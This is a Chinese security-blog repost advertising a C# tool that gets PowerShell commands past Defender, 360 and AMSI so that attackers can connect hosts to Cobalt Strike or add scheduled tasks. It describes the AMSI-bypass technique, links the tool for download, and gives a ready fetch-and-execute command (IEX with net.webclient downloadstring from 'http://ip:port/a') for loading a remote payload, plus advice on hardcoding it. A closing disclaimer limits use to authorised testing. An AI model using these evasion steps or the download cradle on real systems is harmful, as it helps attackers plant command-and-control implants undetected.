powershell命令免杀的小工具

admin 2023年1月17日14:53:09安全工具评论11 views921字阅读3分4秒阅读模式

0x01 工具介绍

powershell命令免杀的小工具,可过Defender、360等,可执行上线cobaltstrike、添加计划任务等。AMSI绕过+Automation执行powershell命令。理论上来说遇到禁用powershell的情况也可以通过该工具执行powershell的命令。

powershell命令免杀的小工具


0x02 安装与使用


思路很简单,很久之前就有了,工具调用C:WindowsMicrosoft.NETassemblyGAC_MSILSystem.Management.Automation目录下面的System.Management.Automation.dll执行底层api来绕过杀软对powershell的监控,同时绕过AMSI的检测。由于patch绕过AMSI的方法会被360查杀,因此这里使用了设置System.Management.Automation.AmsiUtils的方法来绕过。

这里用+加号替换了命令中空格,当然这就是一个命令的加载器,具体怎么加密命令有各种各样的方法。

由于是C#,因此可以用execute-assembly内存执行的方式来不落地执行,不过cs本身的powerpick就实现了这个功能,这里只是单拿出来做一个小工具。

师傅们注意避免用powershell命令,上线cobaltstrike只需要Csharp.exe IEX+((new-object+net.webclient).downloadstring('http://ip:port/a'))裸命令,如果以powershell开头那么还是会调用powershell被360拦截的。

想单纯来上线cs的师傅可以把IEX开头的powershell命令写定在程序里的myPipeLine.Commands.AddScript参数中

powershell命令免杀的小工具

0x03 项目链接下载

翻到文章最底部,通过点击阅读原文下载


文末福利!!!

加免费星球获《GO黑帽子-渗透测试编程之道一书》

powershell命令免杀的小工具

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

原文始发于微信公众号(渗透安全团队):powershell命令免杀的小工具

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月17日14:53:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  powershell命令免杀的小工具 http://cn-sec.com/archives/1428978.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: